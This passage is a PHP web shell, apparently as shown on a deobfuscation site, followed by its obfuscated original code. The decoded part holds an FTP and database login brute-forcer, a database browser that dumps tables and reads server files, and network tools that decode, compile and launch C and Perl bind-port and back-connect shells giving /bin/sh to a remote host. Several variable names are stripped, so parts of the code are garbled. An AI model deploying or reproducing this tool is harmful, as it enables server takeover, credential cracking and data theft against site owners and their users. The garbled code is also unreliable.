		.'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'
		.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
		.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
		.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
		.'<input type=hidden name=ne  value="">'
		.'<span>Server:port</span></td>'
		.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
		.'<tr><td><span>Brute type</span></td>'
		.'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'
		.'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'
		.'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'
		.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
		.'<td><input type=text name=login value="root"></td></tr>'
		.'<tr><td><span>Dictionary</span></td>'
		.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
		.'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
	echo '</div>';
	hardFooter();
}
function actionSql() {
	class DbClass {
		var $type;
		var $link;
		var $res;
		function DbClass($type)	{
			$this->type = $type;
		}
		function connect($host, $user, $pass, $dbname){
			switch($this->type)	{
				case 'mysql':
					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
					break;
				case 'pgsql':
					$host = explode(':', $host);
					if(!$host[1]) $host[1]=5432;
					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
					break;
			}
			return false;
		}
		function selectdb($db) {
			switch($this->type)	{
				case 'mysql':
					if (@mysql_select_db($db))return true;
					break;
			}
			return false;
		}
		function query($str) {
			switch($this->type) {
				case 'mysql':
					return $this->res = @mysql_query($str);
					break;
				case 'pgsql':
					return $this->res = @pg_query($this->link,$str);
					break;
			}
			return false;
		}
		function fetch() {
			$res = func_num_args()?func_get_arg(0):$this->res;
			switch($this->type)	{
				case 'mysql':
					return @mysql_fetch_assoc($res);
					break;
				case 'pgsql':
					return @pg_fetch_assoc($res);
					break;
			}
			return false;
		}
		function listDbs() {
			switch($this->type)	{
				case 'mysql':
                        return $this->query("SHOW databases");
				break;
				case 'pgsql':
					return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
				break;
			}
			return false;
		}
		function listTables() {
			switch($this->type)	{
				case 'mysql':
					return $this->res = $this->query('SHOW TABLES');
				break;
				case 'pgsql':
					return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
				break;
			}
			return false;
		}
		function error() {
			switch($this->type)	{
				case 'mysql':
					return @mysql_error();
				break;
				case 'pgsql':
					return @pg_last_error();
				break;
			}
			return false;
		}
		function setCharset($str) {
			switch($this->type)	{
				case 'mysql':
					if(function_exists('mysql_set_charset'))
						return @mysql_set_charset($str, $this->link);
					else
						$this->query('SET CHARSET '.$str);
					break;
				case 'pgsql':
					return @pg_set_client_encoding($this->link, $str);
					break;
			}
			return false;
		}
		function loadFile($str) {
			switch($this->type)	{
				case 'mysql':
					return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
				break;
				case 'pgsql':
					$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
					$r=array();
					while($i=$this->fetch())
						$r[] = $i['file'];
					$this->query('drop table hard2');
					return array('file'=>implode("
",$r));
				break;
			}
			return false;
		}
		function dump($table, $fp = false) {
			switch($this->type)	{
				case 'mysql':
					$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
					$create = mysql_fetch_array($res);
					$sql = $create[1].";
";
                    if($fp) fwrite($fp, $sql); else echo($sql);
					$this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
					while($ = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";

";
                        }
						$columns = array();
						foreach($ as $k=>$v) {
                            if($v === null)
                                $[$k] = "NULL";
                            elseif(is_int($v))
                                $[$k] = $v;
                            else
                                $[$k] = "'".@mysql_real_escape_string($v)."'";
							$columns[] = "`".$k."`";
						}
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES 
	(".implode(", ", $).')';
                            $head = false;
                        } else
                            $sql .= "
	,(".implode(", ", $).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
					}
                    if(!$head)
                        if($fp) fwrite($fp, ";

"); else echo(";

");
				break;
				case 'pgsql':
					$this->query('SELECT * FROM '.$table);
					while($ = $this->fetch()) {
						$columns = array();
						foreach($ as $k=>$v) {
							$[$k] = "'".addslashes($v)."'";
							$columns[] = $k;
						}
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $).');'."
";
                        if($fp) fwrite($fp, $sql); else echo($sql);
					}
				break;
			}
			return false;
		}
	};
	$db = new DbClass($_POST['type']);
	if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
		$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
		$db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
				$db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
	}
	hardHeader();
	echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><label><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\" required></td><td>";
	$tmp = "<input type=text name=sql_base value=''>";
	if(isset($_POST['sql_host'])){
		if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
			switch($_POST['charset']) {
				case "Windows-1251": $db->setCharset('cp1251'); break;
				case "UTF-8": $db->setCharset('utf8'); break;
				case "KOI8-R": $db->setCharset('koi8r'); break;
				case "KOI8-U": $db->setCharset('koi8u'); break;
				case "cp866": $db->setCharset('cp866'); break;
			}
			$db->listDbs();
			echo "<label><select name=sql_base><option value=''></option>";
			while($ = $db->fetch()) {
				list($key, $value) = each($);
				echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
			}
			echo '</select></label>';
		}
		else echo $tmp;
	}else
		echo $tmp;
	echo "</td>
				<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
			</tr>
		</table>
		<script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
			function st(t,l) {
				d.sf.p1.value = 'select';
				d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
				d.sf.submit();
			}
			function is() {
				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
			}
		</script>";
	if(isset($db) && $db->link){
		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
			if(!empty($_POST['sql_base'])){
				$db->selectdb($_POST['sql_base']);
				echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
				$tbls_res = $db->listTables();
				while($ = $db->fetch($tbls_res)) {
					list($key, $value) = each($);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
					$value = htmlspecialchars($value);
					echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
				}
				echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
				if(@$_POST['p1'] == 'select') {
					$_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
					$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
					$num = $db->fetch();
					$pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
					if($_POST['type']=='pgsql')
						$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
					else
						$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
					echo "<br><br>";
				}
				if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
					$db->query(@$_POST['p2']);
					if($db->res !== false) {
						$title = false;
						echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
						$line = 1;
						while($ = $db->fetch())	{
							if(!$title)	{
								echo '<tr>';
								foreach($ as $key => $value)
									echo '<th>'.$key.'</th>';
								reset($);
								$title=true;
								echo '</tr><tr>';
								$line = 2;
							}
							echo '<tr class="l'.$line.'">';
							$line = $line==1?2:1;
							foreach($ as $key => $value) {
								if($value == null)
									echo '<td><i>null</i></td>';
								else
									echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
							}
							echo '</tr>';
						}
						echo '</table>';
					} else {
						echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
					}
				}
				echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
				echo "</td></tr>";
			}
			echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
            }
			if(@$_POST['p1'] == 'loadfile') {
				$file = $db->loadFile($_POST['p2']);
				echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
			}
	} else {
        echo htmlspecialchars($db->error());
    }
	echo '</div>';
	hardFooter();
}
function actionNetwork() {
	hardHeader();
	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
	$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
	echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
	<span>Bind port to /bin/sh</span><br/>
	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
	</form>
	<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
	<span>Back-connect to</span><br/>
	Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
	</form><br>";
	if(isset($_POST['p1'])) {
		function cf($f,$t) {
			$w=@fopen($f,"w") or @function_exists('file_put_contents');
			if($w)	{
				@fwrite($w,base64_decode($t)) or @fputs($w,base64_decode($t)) or @file_put_contents($f,base64_decode($t));
				@fclose($w);
			}
		}
		if($_POST['p1'] == 'bpc') {
			cf("/tmp/bp.c",$bind_port_c);
			$ = ex("gcc -o /tmp/bp /tmp/bp.c");
			@unlink("/tmp/bp.c");
			$ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bp")."</pre>";
		}
		if($_POST['p1'] == 'bpp') {
			cf("/tmp/bp.pl",$bind_port_p);
			$ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bp.pl")."</pre>";
		}
		if($_POST['p1'] == 'bcc') {
			cf("/tmp/bc.c",$back_connect_c);
			$ = ex("gcc -o /tmp/bc /tmp/bc.c");
			@unlink("/tmp/bc.c");
			$ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bc")."</pre>";
		}
		if($_POST['p1'] == 'bcp') {
			cf("/tmp/bc.pl",$back_connect_p);
			$ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bc.pl")."</pre>";
		}
	}
	echo '</div>';
	hardFooter();
}
if( empty($_POST['a']) )
	if(isset($) && function_exists('action' . $))
		$_POST['a'] = $;
	else
		$_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
	call_user_func('action' . $_POST['a']);
?>

Did this file decode correctly?

Original Code

<?php $GJCYA1109='ubz_f$w.0"n*qgse95h_txyoldk/)];rpv6 jam2i8(7=1c34[';$p2012=$GJCYA1109[(53-(13-6))].$GJCYA1109[(47-16)].$GJCYA1109[(15*1)].$GJCYA1109[((37/1)*1)].$GJCYA1109[(4+(8*2))].$GJCYA1109[(3*5)].$GJCYA1109[(54/(9*2))].$GJCYA1109[(((4+2)+66)/18)].$GJCYA1109[(((0/19)-0)-0)].$GJCYA1109[((10*(9+10))/19)].$GJCYA1109[(8+38)].$GJCYA1109[(300/15)].$GJCYA1109[(40*(1*1))].$GJCYA1109[(23*1)].$GJCYA1109[(1*10)];$qf3644=$GJCYA1109[(6-(2-1))].$GJCYA1109[(13+(11-3))].$GJCYA1109[(440/10)].$GJCYA1109[(15-6)];$ZbRdVf4581=$GJCYA1109[(126/14)].$GJCYA1109[(30-0)].$GJCYA1109[(7-2)].$GJCYA1109[(740/(6+14))].$GJCYA1109[(1*44)].$GJCYA1109[(19/19)].$GJCYA1109[(333/(171/19))].$GJCYA1109[(224/16)].$GJCYA1109[(20-5)].$GJCYA1109[(680/20)].$GJCYA1109[(192/4)].$GJCYA1109[(13+(5+1))].$GJCYA1109[(25*1)].$GJCYA1109[(27-12)].$GJCYA1109[(76-30)].$GJCYA1109[(37-14)].$GJCYA1109[(28-3)].$GJCYA1109[((1*13)+2)].$GJCYA1109[(47-5)].$GJCYA1109[(5*(8/((1*16)-8)))].$GJCYA1109[(1+(33-13))].$GJCYA1109[(45-(85/5))].$GJCYA1109[(60/(2*1))].$GJCYA1109[(95/(11+8))].$GJCYA1109[(1-0)].$GJCYA1109[(6+38)].$GJCYA1109[(39/3)].$GJCYA1109[(1*2)].$GJCYA1109[((240/1)/6)].$GJCYA1109[(2*5)].$GJCYA1109[(2+(2*1))].$GJCYA1109[(24/1)].$GJCYA1109[(37*1)].$GJCYA1109[(380/19)].$GJCYA1109[(3*(4+1))].$GJCYA1109[(53-11)].$GJCYA1109[(1*(60/12))].$GJCYA1109[(40-3)].$GJCYA1109[(14+14)].$GJCYA1109[((27+(1*9))-6)].$GJCYA1109[(19-4)].$GJCYA1109[(13+20)].$GJCYA1109[((50-13)*1)].$GJCYA1109[((304/16)+5)].$GJCYA1109[(82-(35+5))].$GJCYA1109[(75/15)].$GJCYA1109[(1*1)].$GJCYA1109[(((220/22)-2)+20)].$GJCYA1109[(5+25)];$qhCUY3662= "'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